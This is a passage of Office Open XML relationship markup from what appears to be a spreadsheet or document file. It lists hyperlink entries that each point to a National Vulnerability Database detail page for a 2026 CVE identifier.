Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78971" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0001" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28627" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45527" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53638" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79588" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79603" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86736" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86853" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86994" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86995" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12285" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49895" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75726" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0054" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28630" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28660" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45519" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45525" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55290" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86564" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86670" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82710" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86515" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86518" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86675" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16003" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86644" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86667" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45219" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45220" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49153" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49154" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49155" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49156" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70613" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70614" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7809" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82514" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86477" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92595" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92596" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92597" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92598" 